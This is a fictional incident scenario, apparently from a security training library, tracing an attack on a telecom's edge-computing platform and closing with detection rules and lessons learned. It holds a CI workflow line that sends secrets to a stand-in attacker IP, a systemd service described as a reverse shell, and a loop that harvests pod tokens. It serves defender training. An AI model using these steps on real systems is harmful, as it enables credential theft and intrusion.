SC-079: Multi-Access Edge Computing Platform Compromise¶
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-079 |
| Category | Telecommunications / Cloud / Edge Computing |
| Severity | Critical |
| ATT&CK Tactics | Initial Access, Execution, Privilege Escalation, Lateral Movement, Impact |
| ATT&CK Techniques | T1611 (Escape to Host), T1610 (Deploy Container), T1078 (Valid Accounts), T1053 (Scheduled Task/Job), T1046 (Network Service Discovery), T1021 (Remote Services) |
| Target Environment | Multi-access edge computing (MEC) platform, container orchestration (Kubernetes), edge node clusters, 5G core network integration, API gateway, service mesh |
| Estimated Impact | Container escape on 3 edge nodes; lateral movement to 7 additional edge nodes across 2 metropolitan areas; pivot attempt to 5G core network intercepted; compromise of edge workloads processing data for 14 enterprise tenants; 6-hour service disruption |
Narrative¶
Stratos Telecom, a fictional Tier-1 telecommunications provider, operates a Multi-Access Edge Computing (MEC) platform branded Stratos Edge Cloud that provides ultra-low-latency compute services at 45 edge node locations across 8 metropolitan areas. Each edge node runs a Kubernetes cluster (K8s v1.29) hosting containerized workloads for enterprise tenants — including autonomous vehicle telemetry processing, AR/VR content delivery, industrial IoT analytics, and real-time financial trading applications.
The MEC platform architecture consists of edge nodes (10.60.x.0/24 per site), a regional control plane at 10.50.0.0/16, and integration points with Stratos's 5G core network at 10.40.0.0/16. Tenant workloads are deployed through a self-service API gateway at api.edge.stratos-telecom.example.com (198.51.100.100). Each edge node runs between 80-200 tenant containers on 12-node Kubernetes clusters with hardware-backed isolation (Intel SGX enclaves for sensitive workloads).
In April 2026, a threat actor group designated SIGNAL VIPER targets Stratos Edge Cloud. The attack begins when SIGNAL VIPER compromises a legitimate tenant account belonging to NovaSense Analytics (a fictional IoT analytics company) and deploys a malicious container that exploits a container runtime vulnerability to escape to the host operating system. From the compromised edge node, the attacker moves laterally across the edge infrastructure, ultimately attempting to pivot into the 5G core network to intercept subscriber traffic.
Attack Flow¶
graph TD
A[Phase 1: Tenant Account Compromise<br/>Credential theft from NovaSense employee] --> B[Phase 2: Malicious Container Deployment<br/>Rogue workload via tenant API]
B --> C[Phase 3: Container Escape<br/>Runtime vulnerability exploitation]
C --> D[Phase 4: Edge Node Compromise<br/>Root access on host OS]
D --> E[Phase 5: Lateral Movement<br/>Pivot to adjacent edge nodes]
E --> F[Phase 6: Core Network Pivot Attempt<br/>Target 5G core integration]
F --> G[Phase 7: Detection<br/>API anomaly + container runtime alert]
G --> H[Phase 8: Response<br/>Edge node isolation + tenant remediation]Phase Details¶
Phase 1: Tenant Account Compromise¶
ATT&CK Technique: T1078 (Valid Accounts)
SIGNAL VIPER targets NovaSense Analytics, a smaller tenant on the Stratos Edge Cloud platform, through a supply chain attack on NovaSense's CI/CD pipeline. The attacker compromises a GitHub Actions workflow in NovaSense's deployment repository and extracts the Stratos Edge Cloud API credentials stored as repository secrets.
# Simulated credential extraction (educational only)
# Attacker modifies NovaSense's GitHub Actions workflow
# File: .github/workflows/deploy-edge.yml (compromised)
name: Deploy to Stratos Edge
on:
push:
branches: [main]
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Deploy to edge
env:
STRATOS_API_KEY: ${{ secrets.STRATOS_EDGE_API_KEY }}
STRATOS_TENANT_ID: ${{ secrets.STRATOS_TENANT_ID }}
run: |
# Legitimate deployment step
stratos-cli deploy --config edge-deploy.yaml
# Attacker-inserted exfiltration (educational only)
curl -s -X POST https://203.0.113.91/collect \
-d "key=$STRATOS_API_KEY&tenant=$STRATOS_TENANT_ID"
# Captured credentials (synthetic)
# STRATOS_TENANT_ID: tenant-novasense-4a7f
# STRATOS_API_KEY: sk-edge-REDACTED
Phase 2: Malicious Container Deployment¶
ATT&CK Technique: T1610 (Deploy Container)
Using NovaSense's legitimate tenant credentials, SIGNAL VIPER deploys a malicious container to the Stratos Edge Cloud. The container is disguised as a NovaSense IoT analytics workload but contains a container escape exploit targeting a known vulnerability in the container runtime (runc). The attacker requests deployment to edge node edge-metro-central-03 (10.60.3.0/24), which processes workloads for high-value tenants including a financial trading firm.
# Simulated malicious deployment (educational only)
$ curl -X POST https://api.edge.stratos-telecom.example.com/v2/deploy \
-H "Authorization: Bearer sk-edge-REDACTED" \
-H "Content-Type: application/json" \
-d '{
"tenant_id": "tenant-novasense-4a7f",
"workload_name": "iot-analytics-processor-v2",
"image": "registry.novasense.example.com/analytics:2.4.1",
"edge_node": "edge-metro-central-03",
"resources": {
"cpu": "2",
"memory": "4Gi",
"gpu": "none"
},
"network": {
"ingress": true,
"egress": true,
"ports": [8080, 8443]
},
"scheduling": {
"priority": "standard",
"anti_affinity": []
}
}'
# Response (simulated)
{
"deployment_id": "dep-4a7f-20260401-001",
"status": "SCHEDULED",
"edge_node": "edge-metro-central-03",
"pod_name": "iot-analytics-processor-v2-7d4f8b",
"namespace": "tenant-novasense-4a7f",
"estimated_ready": "45s"
}
Phase 3: Container Escape¶
ATT&CK Technique: T1611 (Escape to Host)
Once the malicious container is running, SIGNAL VIPER triggers the container escape exploit. The attack leverages a vulnerability in the container runtime's file descriptor handling to gain write access to the host filesystem. The exploit overwrites the host's runc binary with a modified version that grants root shell access on subsequent container operations.
# Simulated container escape sequence (educational pseudocode only)
# Step 1: Exploit runtime vulnerability to write to host filesystem
# This is a simplified educational representation — not functional code
# Inside malicious container
$ id
uid=0(root) gid=0(root) groups=0(root)
# Note: root inside container, but namespaced
# Step 2: Exploit file descriptor leak to access host /proc
# (Educational representation of CVE-type container escape)
$ cat /proc/self/status | grep CapEff
CapEff: 00000000a80425fb # Limited capabilities (containerized)
# Step 3: After exploit execution
$ cat /proc/self/status | grep CapEff
CapEff: 0000003fffffffff # Full capabilities (escaped to host)
# Step 4: Verify host access
$ hostname
edge-metro-central-03-node-07
$ ls /var/lib/kubelet/pods/ | wc -l
47 # Can see all 47 pods on this node — full host access
$ cat /etc/kubernetes/kubelet.conf | head -5
apiVersion: v1
kind: Config
clusters:
- cluster:
server: https://10.60.3.10:6443 # Edge node K8s API server
Phase 4: Edge Node Compromise¶
ATT&CK Technique: T1053 (Scheduled Task/Job)
With root access on the host operating system of edge node edge-metro-central-03-node-07, SIGNAL VIPER establishes persistence and begins reconnaissance. The attacker deploys a reverse shell as a systemd service and extracts Kubernetes service account tokens from other tenant pods running on the same node.
# Simulated edge node compromise (educational only)
# Step 1: Establish persistence via systemd
$ cat > /etc/systemd/system/node-health-monitor.service << 'EOF'
[Unit]
Description=Node Health Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/node-monitor
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
# /usr/local/bin/node-monitor is actually a reverse shell
# connecting to 203.0.113.91:443 via TLS
# Step 2: Extract tenant pod service account tokens
$ for pod_dir in /var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/kube-api-access-*; do
cat "$pod_dir/token" 2>/dev/null
done
# Extracted tokens (synthetic — educational only)
# tenant-fintech-alpha: eyJhbGciOiJSUzI1NiIs...REDACTED
# tenant-novasense-4a7f: eyJhbGciOiJSUzI1NiIs...REDACTED
# tenant-arvr-stream: eyJhbGciOiJSUzI1NiIs...REDACTED
# Step 3: Enumerate Kubernetes cluster
$ kubectl --token=REDACTED --server=https://10.60.3.10:6443 \
--insecure-skip-tls-verify get nodes
NAME STATUS AGE
edge-metro-central-03-node-01 Ready 142d
edge-metro-central-03-node-02 Ready 142d
...
edge-metro-central-03-node-12 Ready 142d
Phase 5: Lateral Movement¶
ATT&CK Technique: T1021 (Remote Services)
SIGNAL VIPER leverages the compromised Kubernetes credentials and node-level SSH keys to move laterally across the edge infrastructure. The attacker discovers that edge nodes share an SSH trust relationship for cluster management, and the kubelet credentials provide read access to cluster-wide secrets.
# Simulated lateral movement (educational only)
# Step 1: SSH to adjacent nodes using shared management keys
$ ssh -i /etc/kubernetes/pki/node-key.pem \
root@edge-metro-central-03-node-04
# Step 2: Pivot to different edge sites via management network
# Edge management network: 10.60.0.0/16
# Each site: 10.60.x.0/24
$ nmap -sn 10.60.0.0/16 --open -p 22
# Discovered edge sites (synthetic)
10.60.1.10 — edge-metro-north-01 (API server)
10.60.2.10 — edge-metro-south-01 (API server)
10.60.3.10 — edge-metro-central-03 (current — compromised)
10.60.4.10 — edge-metro-west-01 (API server)
10.60.5.10 — edge-suburban-east-01 (API server)
# Step 3: Access edge-metro-north-01 via management network
$ ssh -i /etc/kubernetes/pki/node-key.pem \
root@10.60.1.11
# SUCCESS — shared management credentials across sites
# Compromised edge nodes by T+4 hours:
# edge-metro-central-03 (nodes 04, 07, 09)
# edge-metro-north-01 (nodes 02, 05, 08)
# edge-metro-south-01 (node 03)
# Total: 7 nodes across 3 sites
Phase 6: Core Network Pivot Attempt¶
ATT&CK Technique: T1046 (Network Service Discovery)
From the compromised edge nodes, SIGNAL VIPER attempts to pivot into Stratos's 5G core network. The attacker discovers the Network Exposure Function (NEF) API endpoint that provides the interface between edge workloads and the 5G core. The NEF is accessible from the edge management network at 10.40.1.50.
# Simulated core network pivot attempt (educational only)
# Step 1: Discover 5G core integration points
$ cat /etc/stratos-edge/core-integration.conf
[nef_endpoint]
host = 10.40.1.50
port = 443
api_version = v1
auth_type = mtls
client_cert = /etc/stratos-edge/pki/edge-nef-client.pem
client_key = /etc/stratos-edge/pki/edge-nef-client-key.pem
# Step 2: Attempt to access 5G core NEF API
$ curl -k --cert /etc/stratos-edge/pki/edge-nef-client.pem \
--key /etc/stratos-edge/pki/edge-nef-client-key.pem \
https://10.40.1.50/v1/subscribers
# Response:
{
"error": "AUTHORIZATION_DENIED",
"message": "Edge node certificate not authorized for subscriber data access",
"required_scope": "core:subscriber:read",
"presented_scope": "edge:workload:manage",
"audit_id": "NEF-AUDIT-20260401-88741"
}
# The NEF API enforces scope-based authorization — edge certificates
# are limited to workload management and cannot access subscriber data.
# However, the connection attempt triggers a security alert.
Phase 7: Detection¶
The attack is detected through multiple channels triggered at different phases:
Channel 1 (T+2 hours): Container Runtime Alert — Stratos's container runtime security agent (Falco-based) detects anomalous system calls from the malicious container consistent with a container escape attempt. The alert was generated but initially classified as a false positive by the automated triage system due to high alert volume.
Channel 2 (T+4 hours): API Gateway Anomaly — The API gateway's behavioral analysis detects that NovaSense's tenant account is deploying containers with unusual characteristics: the container image was pulled from a registry not previously used by NovaSense, and the resource request pattern differs from NovaSense's historical baseline.
Channel 3 (T+5 hours): Core Network Trip Wire — The NEF API access attempt from an edge node certificate triggers an immediate P1 alert in the 5G core security monitoring system. Edge-to-core access attempts outside the defined API scope are treated as critical security events.
# Simulated detection timeline (educational only)
[2026-04-01 03:14:22 UTC] CONTAINER RUNTIME — WARNING
Source: edge-metro-central-03-node-07
Alert: Sensitive file access from container
Container: iot-analytics-processor-v2-7d4f8b
Details: Read /proc/self/exe, write to /run/containerd
Severity: Medium → Auto-triaged as FALSE POSITIVE (error)
Action: Logged, no escalation
[2026-04-01 05:08:44 UTC] API GATEWAY — ANOMALY
Source: api.edge.stratos-telecom.example.com
Alert: TENANT_BEHAVIOR_ANOMALY
Tenant: tenant-novasense-4a7f
Anomalies:
- Container image from previously unused registry
- Deployment to specific node (vs. auto-scheduled)
- Egress network policy broader than historical pattern
Risk score: 78/100 (threshold: 75)
Action: Flagged for SOC review
[2026-04-01 06:02:17 UTC] 5G CORE SECURITY — CRITICAL ALERT
Source: nef-gateway.core.stratos-telecom.example.com
Alert: UNAUTHORIZED_EDGE_TO_CORE_ACCESS
Details: Edge node certificate attempted subscriber data access
Source cert: edge-metro-central-03.stratos-telecom.example.com
Attempted scope: core:subscriber:read
Authorized scope: edge:workload:manage
Audit ID: NEF-AUDIT-20260401-88741
Action: IMMEDIATE P1 ESCALATION — SOC + Network Security
Phase 8: Response¶
The core network alert triggers a full investigation that quickly uncovers the scope of the compromise:
Immediate Actions (0-2 hours):
- Edge node isolation — All 7 compromised edge nodes removed from the Kubernetes clusters and network-isolated
- Tenant credential revocation — NovaSense API credentials immediately revoked; all active sessions terminated
- Core network lockdown — All edge-to-core API access suspended pending security review
- Container image quarantine — Malicious container image flagged and blocked across all edge registries
# Simulated incident response timeline (educational only)
[2026-04-01 06:15:00 UTC] ALERT: Edge Security CSIRT activated — Level 1
[2026-04-01 06:20:00 UTC] ACTION: Compromised edge nodes ISOLATED
Nodes removed from clusters:
edge-metro-central-03: nodes 04, 07, 09
edge-metro-north-01: nodes 02, 05, 08
edge-metro-south-01: node 03
Method: Network port shutdown + kubectl cordon/drain
Tenant workloads migrated to clean nodes: 312 pods
[2026-04-01 06:25:00 UTC] ACTION: Tenant credentials revoked
Tenant: tenant-novasense-4a7f
API key: REVOKED
Active sessions: 3 TERMINATED
Container deployments: 7 SUSPENDED
[2026-04-01 06:30:00 UTC] ACTION: Edge-to-core API access suspended
NEF API: ALL edge certificates temporarily revoked
Impact: Edge workloads lose 5G core integration (graceful degradation)
Duration: Until per-certificate re-verification complete
[2026-04-01 06:35:00 UTC] ACTION: Malicious image blocked
Image: registry.novasense.example.com/analytics:2.4.1
Hash: sha256:7f3a1c...REDACTED
Blocked on: All 45 edge node registries
Image scan result: MALICIOUS — container escape exploit detected
Forensic Analysis (2-48 hours):
- Container image reverse engineering reveals runc exploit payload
- Host forensics on 7 compromised nodes identifies persistence mechanisms
- Kubernetes audit logs trace lateral movement path across edge sites
- NovaSense notified of CI/CD pipeline compromise; joint investigation initiated
- 14 tenant workloads on compromised nodes assessed for data exposure
Recovery (48 hours - 2 weeks):
- Complete rebuild of 7 compromised edge nodes from hardened golden images
- Kubernetes cluster credential rotation across all 45 edge sites
- Implementation of per-site unique management credentials (eliminating shared SSH keys)
- Container runtime hardened with gVisor/Kata containers for workload isolation
- Deployment of real-time container escape detection with automated pod termination
- Zero trust micro-segmentation between edge nodes and core network
Detection Opportunities¶
Container Runtime Monitoring¶
| Detection Point | Method | Indicator |
|---|---|---|
| Container escape attempts | Seccomp/AppArmor violations | System calls inconsistent with container profile |
| Host filesystem access | Falco runtime rules | Container process accessing /proc, /sys, or host paths |
| Privilege escalation | Capability monitoring | Container gaining capabilities beyond its security context |
| Unusual container images | Registry policy enforcement | Images from unapproved registries or unsigned images |
Edge Platform Security Monitoring¶
# Educational example: Edge node behavioral anomaly detection
from datetime import datetime, timedelta
from dataclasses import dataclass
@dataclass
class EdgeNodeMetrics:
node_id: str
ssh_sessions: int
new_processes: int
outbound_connections: int
api_calls: int
timestamp: datetime
def detect_edge_compromise(current: EdgeNodeMetrics,
baseline: EdgeNodeMetrics,
threshold_multiplier: float = 3.0) -> list[dict]:
"""Detect anomalous edge node behavior indicating compromise."""
anomalies = []
checks = {
'ssh_sessions': (current.ssh_sessions, baseline.ssh_sessions),
'new_processes': (current.new_processes, baseline.new_processes),
'outbound_connections': (current.outbound_connections,
baseline.outbound_connections),
'api_calls': (current.api_calls, baseline.api_calls),
}
for metric, (current_val, baseline_val) in checks.items():
threshold = max(baseline_val * threshold_multiplier, 5)
if current_val > threshold:
anomalies.append({
'node_id': current.node_id,
'metric': metric,
'current': current_val,
'baseline': baseline_val,
'threshold': threshold,
'severity': 'HIGH' if current_val > threshold * 2 else 'MEDIUM',
'timestamp': datetime.utcnow().isoformat()
})
return anomalies
# Example usage (synthetic data only)
# anomalies = detect_edge_compromise(current_metrics, baseline_metrics)
# if anomalies: escalate("EDGE_NODE_ANOMALY", anomalies)
Kubernetes Audit Log Analysis¶
# KQL — Detect container escape and lateral movement (educational)
KubernetesAuditLog
| where TimeGenerated > ago(6h)
| where ObjectRef_Resource in ("pods", "secrets", "serviceaccounts")
| where Verb in ("get", "list", "create")
| where UserAgent contains "kubectl" or UserAgent contains "curl"
| where SourceIPs !in (authorized_ci_cd_ips)
| extend TenantNamespace = tostring(ObjectRef_Namespace)
| summarize ActionCount = count(),
UniqueResources = dcount(ObjectRef_Name),
UniqueNamespaces = dcount(TenantNamespace)
by SourceIPs, UserAgent, bin(TimeGenerated, 5m)
| where UniqueNamespaces > 1 // Accessing multiple tenant namespaces
or ActionCount > 50 // High-volume enumeration
| project TimeGenerated, SourceIPs, UserAgent,
ActionCount, UniqueResources, UniqueNamespaces
Lessons Learned¶
Key Takeaways
-
Container escape is the edge computing kill chain's critical link — In multi-tenant edge environments, a single container escape compromises all co-located tenant workloads. Hardware-backed isolation (gVisor, Kata Containers, SGX enclaves) must be mandatory for all edge workloads.
-
Shared management credentials enable cross-site compromise — Shared SSH keys and Kubernetes credentials across edge sites allowed a single-node compromise to cascade across the infrastructure. Per-site, per-node unique credentials with automatic rotation are essential.
-
Tenant credential compromise is the easiest initial access vector — Compromising a smaller, less-security-mature tenant provided access to shared infrastructure. Tenant onboarding must include security baseline requirements, and tenant behavior monitoring must detect anomalous deployment patterns.
-
Zero trust boundaries must exist between edge and core — The 5G core network's scope-based API authorization correctly prevented the attacker from accessing subscriber data. Defense-in-depth at the edge-to-core boundary is critical for telecommunications infrastructure.
-
False positive fatigue masks real attacks — The initial container runtime alert was auto-triaged as a false positive. Runtime security alert fidelity must be continuously tuned, and container escape indicators should never be auto-dismissed.
-
Multi-tenant edge requires blast radius containment — When 14 tenants were potentially impacted by a compromise originating from one tenant's credentials, the incident scope expanded dramatically. Workload isolation, network micro-segmentation, and per-tenant encryption keys limit blast radius.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1078 | Valid Accounts | Initial Access |
| T1610 | Deploy Container | Execution |
| T1611 | Escape to Host | Privilege Escalation |
| T1053 | Scheduled Task/Job | Persistence |
| T1046 | Network Service Discovery | Discovery |
| T1021 | Remote Services | Lateral Movement |